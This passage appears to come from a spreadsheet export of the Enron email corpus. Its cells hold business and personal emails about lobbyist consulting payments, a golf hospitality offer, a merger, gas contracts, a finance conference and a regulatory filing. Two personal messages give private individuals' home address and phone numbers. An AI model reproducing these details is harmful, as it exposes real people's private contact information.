paid to Albert Lorenzo with Quantum Results, Inc. in connection with the _x000D_
Consulting  Services Agreement we have with him._x000D_
_x000D_
Please advise if your department has already taken care of this payment _x000D_
and/or confirm that you want me to take care of this payment._x000D_
_x000D_
Thank you._x000D_
_x000D_
Kathleen_x000D_
_x000D_
 -----Original Message-----_x000D_
From:  Ann Elizabeth White  _x000D_
Sent: Friday, May 18, 2001 10:40 PM_x000D_
To: Marchris Robinson; jsteffe; Ben Jacoby_x000D_
Cc: gkrause; Steven Krimsky; Kathleen Carnahan_x000D_
Subject: Consulting Agreements with lobbyists_x000D_
Importance: High_x000D_
_x000D_
As you know, in the last few months we have had discussions regarding the _x000D_
retention of lobbyists to perform services on our Florida Power Development _x000D_
Projects.  It was decided that we would have the lobbyists retained through _x000D_
the Government Affairs group.  Two recent agreements, one with Quantum _x000D_
Results and another with Tripp, Scott, provided for payments to be made at _x000D_
certain junctures of our development process.  It has come to our attention _x000D_
that these payments were not timely made.   In order to make sure that we _x000D_
don't inadvertently miss any future payments, I am proposing that:_x000D_
_x000D_
1.  We continue to retain the consultants through execution of a consulting _x000D_
services agreement signed by Government Affairs.  The consulting agreements _x000D_
will be prepared in duplicate originals so that the lobbyist keeps one copy _x000D_
and Enron keeps one copy._x000D_
_x000D_
2.  Legal will retain Enron's executed original and provide it to Kay Young, _x000D_
who maintains a database of all consulting agreements and confidentiality _x000D_
agreements entered into by ENA entities._x000D_
_x000D_
3.  Legal will distribute a copy of the executed document to government _x000D_
affairs for their records._x000D_
_x000D_
4.  Legal will distribute a copy of the executed document to Kathleen _x000D_
Carnahan who will set up a payment schedule.  Unlike our real property option _x000D_
agreements that have a date certain for payment, these agreements often have _x000D_
payment schedules dependent upon some approval process.  Thus, it will be _x000D_
important for all of us to keep Kathleen in the loop as to dates of hearings _x000D_
or approvals so that she will know if it is time for a payment._x000D_
_x000D_
5.  Kathleen will provide notices to government affairs that a payment is _x000D_
due, and the amount of the payment and arrange for reimbursement of such _x000D_
payment out of the development group's RC._x000D_
_x000D_
6.  Government affairs will make the payments and be reimbursed out of the _x000D_
development group's RC.  _x000D_
_x000D_
Please advise if this system will work for you so that we can undertake to _x000D_
have Kathleen begin setting up a payment schedule._x000D_
_x000D_
My strong preference is that we continue to keep things flowing through the _x000D_
government affairs group so that we consistently maintain the lobbyist _x000D_
relationship.  However, this will require government affairs have some way of _x000D_
monitoring the agreements.  I think we fix that problem with having Kathleen _x000D_
keep a consultant schedule just as she keeps an option schedule._x000D_
_x000D_
I'm going on vacation as of next Wednesday so your response by Tuesday will _x000D_
be greatly appreciated._x000D_
</t>
  </si>
  <si>
    <t>Mon, 5 Jun 2000 10:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mike_buttrey@mhbt.com'})</t>
  </si>
  <si>
    <t>RE: 2001 U.S. Open</t>
  </si>
  <si>
    <t xml:space="preserve">Mike, we appreciate you keeping Jeff in the loop for the 2001 U.S. Open.  _x000D_
However, Jeff is not a golfer and has decided to decline this invitation.  _x000D_
Thank you for the offer. _x000D_
Katherine for Jeff Skilling _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mike Buttrey &lt;Mike_Buttrey@mhbt.com&gt; on 06/05/2000 04:58:32 PM_x000D_
To: "'Jeff Skilling'" &lt;JSkilli@Enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE: 2001 U.S. Open_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Jeff, this message is self explanatory.? Pat Arthur of our office is "in _x000D_
charge" of selling and setting up hospitality suites for companies in Texas _x000D_
and we have an opportunity for our firm and our firm's friends to sign up _x000D_
before he "goes public".? If Enron would be interested, let me know and I _x000D_
will make sure it is taken care of._x000D_
_x000D_
Regards, _x000D_
_x000D_
Mike Buttrey _x000D_
_x000D_
PS? thanks again for lunch. _x000D_
_x000D_
-----Original Message----- _x000D_
From:?? Pat Arthur _x000D_
Sent:?? Monday, June 05, 2000 9:15 AM _x000D_
To:???? #10 Producers _x000D_
Subject:??????? 2001 U.S. Open _x000D_
_x000D_
The U.S. Open golf? tournament will be held at Southern Hills Country Club in _x000D_
Tulsa next June 11-17. _x000D_
_x000D_
With few exceptions the OPEN is never held this far south, thus making the _x000D_
event very accessible to those of us in the Dallas area. This will mark the _x000D_
3rd Open to be held at SHCC._x000D_
_x000D_
I've been asked to assist in the Corporate Hospitality for the event. Because _x000D_
of this it is possibly to offer to your clients an invitation to one of the _x000D_
world's preeminent sporting events. To see it live , to watch the drama _x000D_
unfold in person, is an unforgettable moment. This is one reason why _x000D_
companies want to secure a corporate hospitality package. Before I put the _x000D_
word out in the Dallas market (and they will sell out soon) I wanted clients _x000D_
of MHBT to have the first shot. (I think this is a fair privilage)_x000D_
_x000D_
The tickets to the event are sold out already, so the only way to gain access _x000D_
is via a hospitality package. They aren't cheap but the chance to have a U.S. _x000D_
Open so close might never happen again. Prices are from? $28,500 to $150,000. _x000D_
These prices range from a table in a furnished, shared pavilion to an _x000D_
exclusive environment. _x000D_
_x000D_
If you have anyone you think might be interested please let me know and I _x000D_
will be happy to visit with them and describe all the amenities associated _x000D_
with each option. _x000D_
_x000D_
These started to go on sale in the Tulsa marketplace recently and several _x000D_
options are SOLD OUT, including a few over $ 500,000._x000D_
_x000D_
Since demand is so high and space is limited I will hold off a week before _x000D_
making non-MHBT clients aware of this opportunity of a lifetime._x000D_
_x000D_
Take advantage of getting your best clients into the 2001 U.S. Open. _x000D_
_x000D_
Pat _x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 23 Jul 1999 09:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>mockery</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Gerald Nemec/HOU/ECT on 07/23/99 04:00 PM _x000D_
---------------------------_x000D_
   _x000D_
	Enron Capital &amp; Trade Resources Corp._x000D_
	_x000D_
	From:  "Lisa Nemec" &lt;lnemec@ect.enron.com&gt;                           07/23/99 _x000D_
03:58 PM_x000D_
	_x000D_
_x000D_
To: Gerald Nemec/HOU/ECT_x000D_
cc:  _x000D_
Subject: mockery_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Lisa Nemec/HOU/ECT on 07/23/99 03:57 PM_x000D_
---------------------------_x000D_
_x000D_
_x000D_
 (Embedded_x000D_
 image moved_x000D_
 to file:      From:  Adam Gross_x000D_
 pic31612.pcx) 07/22/99 05:00 PM_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
To:   bradoff@3rdpoint.com, Lisa Nemec/HOU/ECT@ECT, jifjam@umich.edu_x000D_
cc:_x000D_
Subject:  mockery_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Adam Gross/HOU/ECT on 07/22/99 04:59 PM_x000D_
---------------------------_x000D_
_x000D_
From: Andrew Thomas on 07/22/99 11:13 AM_x000D_
_x000D_
To:   Paul H Racicot/HOU/ECT@ECT, John Buckner Thomas/HOU/ECT@ECT, Agatha_x000D_
      Andraczke/HOU/ECT@ECT, Adam Gross/HOU/ECT@ECT, Paul J_x000D_
      Broderick/HOU/ECT@ECT_x000D_
cc:_x000D_
Subject:  mockery_x000D_
_x000D_
(See attached file: mockery.exe)_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - pic31612.pcx_x000D_
 - mockery.exe_x000D_
</t>
  </si>
  <si>
    <t>Wed, 3 Oct 2001 13:30:12 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'credit &lt;.williams@enron.com&gt;', 'tanya.rohauer@enron.com'})</t>
  </si>
  <si>
    <t>Belco Oil &amp; Gas/Westport Resources merger</t>
  </si>
  <si>
    <t xml:space="preserve">Tanya/Jay,_x000D_
I am forwarding to you documentation from Westport Resources Corporation regarding the merger with Belco Oil &amp; Gas.  As you know, we have existing financial agreements with both companies, as identified below:_x000D_
_x000D_
Belco Oil &amp; Gas - Master Energy Price Swap Agreement dated July 8, 1999, which has unlimited credit_x000D_
Westport Oil &amp; Gas Company, Inc. - ISDA Master Agreement dated March 17, 1998_x000D_
_x000D_
The Counterparty wants to retain the Belco Master.  Please let me know what Credit wants to do._x000D_
_x000D_
Stephanie </t>
  </si>
  <si>
    <t>Mon, 6 Aug 2001 10:44:19 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: more seattle advice</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry it took me so long to respond.  It's been really busy here lately.  You're going to be so disappointed in us, but we never ended up kayaking.  Monique and I were so glad that you and Luke came to meet us for drinks.  It was so fun getting to talk to y'all and hear all about Seattle and Vancouver._x000D_
_x000D_
The weather actually turned out to be really good so we spent a lot of time outside.  The Market was fantastic.  We actually bought some boiled shrimp there and took in back to the hotel for a little in room picnic.  We also hit "the Bite" which was really neat._x000D_
_x000D_
Glad you and Luke had a good time in the mountains and please let me know the next time you're in Houston.  It be great to see you again._x000D_
_x000D_
Thanks again for everything,_x000D_
Susan_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	"Bonnie Lathram" &lt;blathram@LMNArchitects.com&gt;@ENRON [mailto:IMCEANOTES-+22Bonnie+20Lathram+22+20+3Cblathram+40LMNArchitects+2Ecom+3E+40ENRON@ENRON.com] _x000D_
Sent:	Wednesday, July 25, 2001 3:02 PM_x000D_
To:	Scott, Susan M._x000D_
Subject:	RE: more seattle advice_x000D_
_x000D_
Tell me about the rest of your trip/_x000D_
_x000D_
it was so fun seeing you again and meeting monique. luke and i both had_x000D_
a really good time_x000D_
_x000D_
i want to hear all about kayaking, etc as i have not yet tried it in_x000D_
seattle._x000D_
_x000D_
hope the weather was nice. we were up in the mountains and it was chilly_x000D_
and kind of cloudy (but really nice- we saw a black bear and a few_x000D_
rainbows)- just gorgeous_x000D_
_x000D_
now back to hot and sunny down in houston, huh???_x000D_
_x000D_
well i hope yall had fun and it was great seeing yuo_x000D_
_x000D_
maybe i will see you soon, if i can ever get to going down to houston to_x000D_
see brad and lisa and my little sister_x000D_
_x000D_
make sure you tell lisa hello for me_x000D_
_x000D_
Take care_x000D_
bonnie_x000D_
_x000D_
-----Original Message-----_x000D_
From: Susan.M.Scott@enron.com [mailto:Susan.M.Scott@enron.com]_x000D_
Sent: Tuesday, July 17, 2001 3:16 PM_x000D_
To: Bonnie Lathram_x000D_
Subject: RE: more seattle advice_x000D_
_x000D_
_x000D_
Thanks Bonnie...we're staying at the Mayflower Inn.  I'll give you a_x000D_
call_x000D_
on your cell phone when we get to town.  It may not be until Friday_x000D_
though_x000D_
since our plane gets in late...but I'll call none the less._x000D_
_x000D_
Susan_x000D_
_x000D_
    -----Original Message-----_x000D_
   From:   "Bonnie Lathram" &lt;blathram@LMNArchitects.com&gt;@ENRON_x000D_
_x000D_
[mailto:IMCEANOTES-+22Bonnie+20Lathram+22+20+3Cblathram+40LMNArchitects+_x000D_
2Ecom+3E+40ENRON@ENRON.com]_x000D_
_x000D_
_x000D_
   Sent:   Tuesday, July 17, 2001 10:30 AM_x000D_
   To:     Scott, Susan M._x000D_
   Subject:  more seattle advice_x000D_
_x000D_
   hey i emailed one of my friends and asked her about kayaking,etc._x000D_
when_x000D_
   i get a chancce i will look up some internet sights that might have_x000D_
info_x000D_
   on that sort of thing in seattle. if you have a sec, you may want to_x000D_
try_x000D_
   seattleinsider.com--- i think they are supposed to be pretty good and_x000D_
   helpful_x000D_
_x000D_
   i havent talked to luke yet, so i dont exactly know my plans for the_x000D_
   weekend unfortunately...._x000D_
_x000D_
   i am thinking that i will head to whistler on early saturday morning,_x000D_
   and that way i can go to dinner with you and your friend on friday_x000D_
   night, or head out and have drinks, or both, or whatever yall want to_x000D_
   do!_x000D_
_x000D_
   the weather is supposed to be great this weekend, but with seattle_x000D_
you_x000D_
   never know._x000D_
_x000D_
   my MAJOR SUGGESTION is that you bring some sort of light jacket for_x000D_
   sure, or a pullover or something. it gets so darn cold at night-_x000D_
believe_x000D_
   me you will be glad.  plus on the ferry ride over to san juans it_x000D_
could_x000D_
   get kind of chilly if you are sitting outside._x000D_
_x000D_
   ive already given you my cell phone number i think (206.851.9177)_x000D_
   definitely call me when you get in town on thursday night or on_x000D_
friday._x000D_
   the number i have given you is my cell phone and you can call me_x000D_
anytime_x000D_
   on it. if i dont answer, i check it frequently and you can leave a_x000D_
   message and ill call you back._x000D_
_x000D_
   very exciting to have visitors from texas. see you friday hopefully._x000D_
_x000D_
   oh, where are you staying?_x000D_
   bonnie_x000D_
   -----Original Message-----_x000D_
   From: Scott, Susan M. [mailto:Susan.M.Scott@ENRON.com]_x000D_
   Sent: Monday, July 16, 2001 7:54 AM_x000D_
   To: Bonnie Lathram_x000D_
   Subject: Tour Guide_x000D_
_x000D_
_x000D_
   Hi Bonnie,_x000D_
_x000D_
   How are you doing?  Lisa said you'd broken your foot recently and_x000D_
have_x000D_
   been stuck on crutches...which I'm guessing is no fun when you're_x000D_
riding_x000D_
   public transportation.  Anyway, I was writing to see if you might_x000D_
have_x000D_
   some suggestions of things to do and places to go while in Seattle._x000D_
One_x000D_
   of my co-workers and myself are flying up Thursday for a long weekend_x000D_
in_x000D_
   your fair city and were hoping to get a few pointers.  I hope you're_x000D_
   still enjoying things as much as you were a few months ago.  It looks_x000D_
   like you may have changed jobs already, which I trust is a good thing_x000D_
   for you.  I'm very anxious to see the city and all it has to_x000D_
   offer...there is a part of me that has always thought I'd like to_x000D_
live_x000D_
   in the Pacific Northwest for a while (so this will be a little bit of_x000D_
a_x000D_
   research trip for me).  If you could start thinking of suggestions_x000D_
for_x000D_
   restaurants, bars, outdoor activities, etc. that would be great, and_x000D_
   maybe if you're in town we could get together for a meal or a drink._x000D_
_x000D_
   Thanks a bunch,_x000D_
   Susan_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Mar 2001 07:07:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Exxon Company, USA Global # 96035668/Sitara # 212225</t>
  </si>
  <si>
    <t xml:space="preserve">FYI_x000D_
---------------------- Forwarded by Daren J Farmer/HOU/ECT on 03/15/2001 _x000D_
03:06 PM ---------------------------_x000D_
_x000D_
_x000D_
Elsa Villarreal_x000D_
03/15/2001 02:42 PM_x000D_
To: Amelia Alland/HOU/ECT@ECT, Cheryl Dudley/HOU/ECT@ECT_x000D_
cc: Daren J Farmer/HOU/ECT@ECT _x000D_
Subject: Exxon Company, USA Global # 96035668/Sitara # 212225_x000D_
_x000D_
Please prepare and send a termination letter by tomorrow March 16, 2001 on _x000D_
the above referenced deal.  Houston Pipe Line Company has not renegotiated a _x000D_
price and have no interest in buying the gas on an evergreen basis.  It is my _x000D_
understanding that we need to notify them within 10 days of the end of the _x000D_
delivery period_x000D_
_x000D_
.  If you need any additional information or have any questions, please _x000D_
contact me at 35656.  Thanks.  EMV_x000D_
</t>
  </si>
  <si>
    <t>Fri, 31 Mar 2000 09:27:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Update</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Vince J Kaminski/HOU/ECT on 03/31/2000 _x000D_
05:28 PM ---------------------------_x000D_
_x000D_
_x000D_
"John D. Martin" &lt;J_Martin@baylor.edu&gt; on 03/28/2000 08:46:06 AM_x000D_
To: aagrawal@cba.ua.edu, Andres Almazan &lt;Andres.Almazan@bus.utexas.edu&gt;, _x000D_
bethel@babson.edu, Murat Binay &lt;mbinay@mail.utexas.edu&gt;, _x000D_
abutler@finance.bus.lsu.edu, Tyrone.Callahan@bus.utexas.edu, Murray Carlson _x000D_
&lt;carlsonm@mail.utexas.edu&gt;, chapman@eco.utexas.edu, Kent Daniel _x000D_
&lt;kent@kent.kellogg.nwu.edu&gt;, fdiebold@stern.nyu.edu, lederington@ou.edu, _x000D_
Harper1@U.Washington.edu, sgillan@tiaa-cref.org, Stuart Gillan _x000D_
&lt;sgillan@tiaa-cref.org&gt;, Denis Gromb &lt;dgromb@MIT.EDU&gt;, grullon@rice.edu, _x000D_
jarradh@oregon.uoregon.edu, jhartzel@stern.nyu.edu, Jhund@mail.utexas.edu, _x000D_
daveike@rice.edu, jegadees@uiuc.edu, cjustic@ect.enron.com, Matthias Kahl _x000D_
&lt;matthias.kahl@anderson.ucla.edu&gt;, ukamins@enron.com, Vince J Kaminski _x000D_
&lt;vkamins@ect.enron.com&gt;, zkhokher@mail.utexas.edu, _x000D_
alynch@debit.stern.nyu.edu, Andras Marosi &lt;Andras.Marosi@bus.utexas.edu&gt;, _x000D_
"John D. Martin" &lt;J_Martin@baylor.edu&gt;, Maxwell@ba.ttu.edu, Beth _x000D_
Miertschin/HOU/ECT@ECT, metrick@Wharton.upenn.edu, "Thomas H. Noe" _x000D_
&lt;tnoe@mailhost.tcs.tulane.edu&gt;, Parrino@mail.utexas.edu, Bill Petty _x000D_
&lt;Bill_Petty@baylor.edu&gt;, manju puri &lt;mpuri@Stanford.EDU&gt;, Ramnath@rice.edu, _x000D_
rampini@nwu.edu, steve_rich@baylor.edu, eronn@mail.utexas.edu (Ehud I. Ronn), _x000D_
Kemal Saatcioglu &lt;KemalS@mail.utexas.edu&gt;, asayrak@jatz.out.edr, _x000D_
sirri@babson.edu, Laura Starks &lt;lstarks@mail.utexas.edu&gt;, suarez@cemfi.es, _x000D_
"A. Subrahmanyam" &lt;asubrahm@anderson.ucla.edu&gt;, _x000D_
Stice@mailhost.tcs.tulane.edu, Titman@mail.utexas.edu, _x000D_
stathis.tompaidis@bus.utexas.edu, wangfa@rice.edu, hong.yan@bus.utexas.edu_x000D_
cc:  (bcc: Vince J Kaminski/HOU/ECT)_x000D_
Subject: Update_x000D_
_x000D_
_x000D_
_x000D_
Hello all,_x000D_
_x000D_
The program for the 2000 Texas Finance Festival has been formalized and can_x000D_
be found on our web site at_x000D_
_x000D_
http://hsb.baylor.edu/html/martinj/festival2.html_x000D_
_x000D_
I do need to remind you of a few things before we converge on San Antonio._x000D_
First, be sure to contact the convention hotel and make your reservations._x000D_
At last count there were only 6 rooms left.  Second, I need a completed_x000D_
application form from everyone so that we can get an accurate meal count._x000D_
I am attaching the program announcement so you can fill out the appropriate_x000D_
boxes for meals and numbers of guests in the event you have not sent in a_x000D_
form._x000D_
_x000D_
Remember that we are starting the conference off with a luncheon on Friday_x000D_
so plan on arriving early Friday or coming in on Thursday evening if you_x000D_
can.  Our hotel is right on the river and there are lots of restaurants and_x000D_
interesting things to visit in the immediate area (the Alamo is across the_x000D_
plaza from the hotel)._x000D_
_x000D_
We are making plans for spouses and children to attend both the dinner on_x000D_
Friday and Saturday evenings.  The Friday evening dinner begins at 6 p.m._x000D_
so that we can be done in plenty of time for our private guided tour of the_x000D_
Alamo at 8:00 p.m.  For Saturday we are still working out plans for the_x000D_
evening so stay tuned._x000D_
_x000D_
There will be more information later as the conference nears.  Looking_x000D_
forward to seeing you all and in beautiful, sunny San Antonio._x000D_
_x000D_
John - announcerev.doc_x000D_
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t>
  </si>
  <si>
    <t>Thu, 1 Nov 2001 17:09:41 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'douglass@energyattorney.com'})</t>
  </si>
  <si>
    <t>frozenset({'crossen.jim@enron.com', 'gardiner.corby@enron.com', 'kebler.curtis@enron.com', 'shea.karen@enron.com', 'nichol.rob@enron.com', 'bulk.max@enron.com', 'pigott.jack@enron.com', 'hatton.curt@enron.com', 'susan.mara@enron.com', 'sandler.vicki@enron.com', 'pelote.roger@enron.com', 'cazalet.ed@enron.com', 'hickok.randy@enron.com', 'purdum.denice@enron.com', 'ross.bill@enron.com', 'johnson.tamara@enron.com', 'mollon.janie@enron.com', 'baker.carolyn@enron.com', 'blue.greg@enron.com', 'schleimer.steve@enron.com', 'ackerman.gary@enron.com', 'miessner.charles@enron.com', 'huhman.steve@enron.com', 'jeff.dasovich@enron.com', 'torgerson.todd@enron.com', 'vaughn.george@enron.com', 'nguyen.nam@enron.com', 'blood.peter@enron.com'})</t>
  </si>
  <si>
    <t>Fw: I.00-11-001 - SCE Monthly Compliance Report</t>
  </si>
  <si>
    <t>And here is SCE's monthly transmission project status report._x000D_
_x000D_
Dan_x000D_
_x000D_
Law Offices of Daniel W. Douglass_x000D_
5959 Topanga Canyon Blvd.  Suite 244_x000D_
Woodland Hills, CA 91367_x000D_
Tel:   (818) 596-2201_x000D_
Fax:  (818) 346-6502_x000D_
douglass@energyattorney.com_x000D_
----- Original Message -----_x000D_
From: &lt;Case.Admin@sce.com&gt;_x000D_
To: &lt;sesco-lf@att.net&gt;; &lt;kmccrea@sablaw.com&gt;;_x000D_
&lt;DavoodiKR@efaches.navfac.navy.mil&gt;; &lt;jimross@r-c-s-inc.com&gt;;_x000D_
&lt;mbrubaker@consultbai.com&gt;; &lt;dnorris@sppc.com&gt;; &lt;mike.montoya@sce.com&gt;;_x000D_
&lt;jkloberdanz@sempra.com&gt;; &lt;svangoor@sempra.com&gt;; &lt;snelson@sempra.com&gt;;_x000D_
&lt;jleslie@luce.com&gt;; &lt;fmo@sdcity.sannet.gov&gt;; &lt;clower@earthlink.net&gt;;_x000D_
&lt;mmilner@coral-energy.com&gt;; &lt;bdunmore@rceo.org&gt;;_x000D_
&lt;district1@co.riverside.ca.us&gt;; &lt;reechpubpol@mail.com&gt;;_x000D_
&lt;FurutaNJ@efawest.navfac.navy.mil&gt;; &lt;mdjoseph@adamsbroadwell.com&gt;;_x000D_
&lt;armi@smwlaw.com&gt;; &lt;marcel@turn.org&gt;; &lt;armi@smwlaw.com&gt;;_x000D_
&lt;bfinkelstein@turn.org&gt;; &lt;jes@cpuc.ca.gov&gt;; &lt;theresa_mueller@ci.sf.ca.us&gt;;_x000D_
&lt;iberrio@greenlining.org&gt;; &lt;lifcentral@lif.org&gt;; &lt;ek@a-klaw.com&gt;;_x000D_
&lt;lroche@fbm.com&gt;; &lt;dpritchard@mofo.com&gt;; &lt;bcragg@gmssr.com&gt;;_x000D_
&lt;jkarp@whitecase.com&gt;; &lt;edwardoneill@dwt.com&gt;; &lt;lindseyhowdowning@dwt.com&gt;;_x000D_
&lt;dtk5@pge.com&gt;; &lt;ssmyers@worldnet.att.net&gt;;_x000D_
&lt;grant_kolling@city.palo-alto.ca.us&gt;; &lt;brflynn@pacbell.net&gt;;_x000D_
&lt;mark.j.smith@fpl.com&gt;; &lt;wbooth@booth-law.com&gt;;_x000D_
&lt;difellman@energy-law-group.com&gt;; &lt;dmarcus@slip.net&gt;;_x000D_
&lt;brbarkovich@earthlink.net&gt;; &lt;bmcc@mccarthylaw.com&gt;;_x000D_
&lt;sberlin@mccarthylaw.com&gt;; &lt;gayatri@jbsenergy.com&gt;; &lt;jeff@jbsenergy.com&gt;;_x000D_
&lt;blaising@braunlegal.com&gt;; &lt;dennis@ddecuir.com&gt;; &lt;dkk@eslawfirm.com&gt;;_x000D_
&lt;fdeleon@energy.state.ca.us&gt;; &lt;maury_kruth@rmiinc.com&gt;; &lt;aorchar@smud.org&gt;;_x000D_
&lt;mpa@a-klaw.com&gt;; &lt;dan@meek.net&gt;; &lt;dws@keywaycorp.com&gt;; &lt;lgurick@calpx.com&gt;;_x000D_
&lt;douglass@energyattorney.com&gt;; &lt;cottomre@sce.com&gt;; &lt;mshames@ucan.org&gt;;_x000D_
&lt;wtippets@dfg.ca.gov&gt;; &lt;ofoote@hkcf-law.com&gt;; &lt;LMOSES@ANAHEIM.NET&gt;;_x000D_
&lt;jpeck@sempra.com&gt;; &lt;rcosta@turn.org&gt;; &lt;nformanek@fbm.com&gt;;_x000D_
&lt;luluw@newsdata.com&gt;; &lt;honest@compuserve.com&gt;; &lt;mark.fillinger@enron.com&gt;;_x000D_
&lt;pschmiege@omm.com&gt;; &lt;bgex@skjerven.com&gt;; &lt;rochmanm@cubjpa.org&gt;;_x000D_
&lt;rochmanm@spurr.org&gt;; &lt;joe.paul@dynegy.com&gt;; &lt;gerspamer@mofo.com&gt;;_x000D_
&lt;sia2@pwrval.com&gt;; &lt;askaff@energy-law-group.com&gt;; &lt;rbw@mrwassoc.com&gt;;_x000D_
&lt;rschmidt@bartlewells.com&gt;; &lt;john.redding@gene.GE.com&gt;; &lt;scottst@mid.org&gt;;_x000D_
&lt;rmccann@cal.net&gt;; &lt;jsole@caiso.com&gt;; &lt;tonywetzel@home.com&gt;;_x000D_
&lt;melanie_gillette@rmiinc.com&gt;; &lt;kevins@ncpa.com&gt;; &lt;mkenny@arb.ca.gov&gt;;_x000D_
&lt;jdh@eslawfirm.com&gt;; &lt;lmh@eslawfirm.com&gt;; &lt;mschwebs@energy.state.ca.us&gt;;_x000D_
&lt;ddavie@hesinet.com&gt;; &lt;kmills@cfbf.com&gt;; &lt;karen@klindh.com&gt;;_x000D_
&lt;mer@cpuc.ca.gov&gt;; &lt;ajo@cpuc.ca.gov&gt;; &lt;bds@cpuc.ca.gov&gt;; &lt;cm1@cpuc.ca.gov&gt;;_x000D_
&lt;ckt@cpuc.ca.gov&gt;; &lt;jxm@cpuc.ca.gov&gt;; &lt;ja1@cpuc.ca.gov&gt;; &lt;kcl@cpuc.ca.gov&gt;;_x000D_
&lt;kl1@cpuc.ca.gov&gt;; &lt;maz@cpuc.ca.gov&gt;; &lt;t02@cpuc.ca.gov&gt;; &lt;meg@cpuc.ca.gov&gt;;_x000D_
&lt;omv@cpuc.ca.gov&gt;; &lt;raw@cpuc.ca.gov&gt;; &lt;sjl@cpuc.ca.gov&gt;; &lt;ssl@cpuc.ca.gov&gt;;_x000D_
&lt;wmp@cpuc.ca.gov&gt;; &lt;xgl@cpuc.ca.gov&gt;; &lt;jmccclusk@energy.state.ca.us&gt;;_x000D_
&lt;gottstein@volcano.net&gt;; &lt;ath@cpuc.ca.gov&gt;; &lt;grosenblum@eob.ca.gov&gt;;_x000D_
&lt;mhesters@energy.state.ca.us&gt;; &lt;rax@cpuc.ca.gov&gt;; &lt;tflynn@eob.ca.gov&gt;;_x000D_
&lt;dkondole@energy.state.ca.us&gt;; &lt;lyn@cpuc.ca.gov&gt;_x000D_
Sent: Thursday, November 01, 2001 2:59 PM_x000D_
Subject: I.00-11-001 - SCE Monthly Compliance Report_x000D_
_x000D_
_x000D_
&gt; To all parties on the e-mail service list for I.00-11-001:_x000D_
&gt;_x000D_
&gt; Attached is the Monthly Compliance Report (November 1, 2001) of SCE_x000D_
&gt; Regarding Status of Transmission Projects, filed today, November 1, 2001._x000D_
&gt; Copies are also being served by U. S. mail on all Parties of Record._x000D_
&gt;_x000D_
&gt; (See attached file: 11-1-01 AB970 Mo Compliance Rept.doc)</t>
  </si>
  <si>
    <t>Wed, 1 Aug 2001 10:52:22 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'pdl8pdl8@yahoo.com'})</t>
  </si>
  <si>
    <t>Hey Ben,_x000D_
_x000D_
Finally getting settled in, here's my new info:_x000D_
_x000D_
3842 Jewell St K303_x000D_
San Diego, 92109_x000D_
home 858-483-2641_x000D_
work 619-652-5477_x000D_
cell 858-349-8312_x000D_
_x000D_
Enjoy the MV trip.  Get in touch if you're ever in_x000D_
town._x000D_
_x000D_
Pete_x000D_
_x000D_
_x000D_
_x000D_
--- Benjamin.Rogers@enron.com wrote:_x000D_
&gt; Peter:_x000D_
&gt; Gppd tp hear from you.  Congrats on heading out to_x000D_
&gt; CA - thats great.  I_x000D_
&gt; know that you been wanting to head west for some_x000D_
&gt; time now.  Work is going_x000D_
&gt; well, I'm in the power trading group, trading MW's._x000D_
&gt; I'm visiting my folks_x000D_
&gt; up in the Vineyard in the beginnning of August, so_x000D_
&gt; it will be good to hang_x000D_
&gt; out up East.  I haven't seen Derek lately, I know he_x000D_
&gt; is in H town, working_x000D_
&gt; for the summer.  Well, good luck with moving out_x000D_
&gt; west and keep in touch._x000D_
&gt; Talk to you soon._x000D_
&gt; Ben_x000D_
&gt;_x000D_
&gt;     -----Original Message-----_x000D_
&gt;    From:   "Pete Loncto" &lt;pdl8@cornell.edu&gt;@ENRON_x000D_
&gt;_x000D_
&gt;_x000D_
[mailto:IMCEANOTES-+22Pete+20Loncto+22+20+3Cpdl8+40cornell+2Eedu+3E+40ENRON@ENRON.com]_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;    Sent:   Thursday, July  5, 2001 5:48 PM_x000D_
&gt;    To:     Rogers, Benjamin_x000D_
&gt;    Subject:_x000D_
&gt;_x000D_
&gt;    Ben!_x000D_
&gt;    Whats happening down in HOuston?  Got some big_x000D_
&gt; news on my end - I am_x000D_
&gt;    moving_x000D_
&gt;    out to San Diego to start a job with_x000D_
&gt; Nicholas-Applegate Capital_x000D_
&gt;    Management._x000D_
&gt;    I've been on vaca, working on my golf game and_x000D_
&gt; tan since graduating_x000D_
&gt;    Cornell_x000D_
&gt;    in May and move out this week.  Looking forward_x000D_
&gt; to the job and the_x000D_
&gt;    lifestyle - I'll be living a few blocks from the_x000D_
&gt; beach and never have to_x000D_
&gt;    see_x000D_
&gt;    snow again!  I'll send along full contact info_x000D_
&gt; once I get fully settled_x000D_
&gt;    in a_x000D_
&gt;    couple of weeks.  COme visit if you are ever out_x000D_
&gt; that way.  Hope all is_x000D_
&gt;    well._x000D_
&gt;    Pete_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
_x000D_
_x000D_
___________________________________________________x000D_
Do You Yahoo!?_x000D_
Make international calls for as low as $.04/minute with Yahoo! Messenger_x000D_
http://phonecard.yahoo.com/</t>
  </si>
  <si>
    <t>Tue, 14 Nov 2000 11:17:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'eligible.employees@enron.com'})</t>
  </si>
  <si>
    <t>Deferral Enrollment 2001</t>
  </si>
  <si>
    <t xml:space="preserve">                                              =20_x000D_
_x000D_
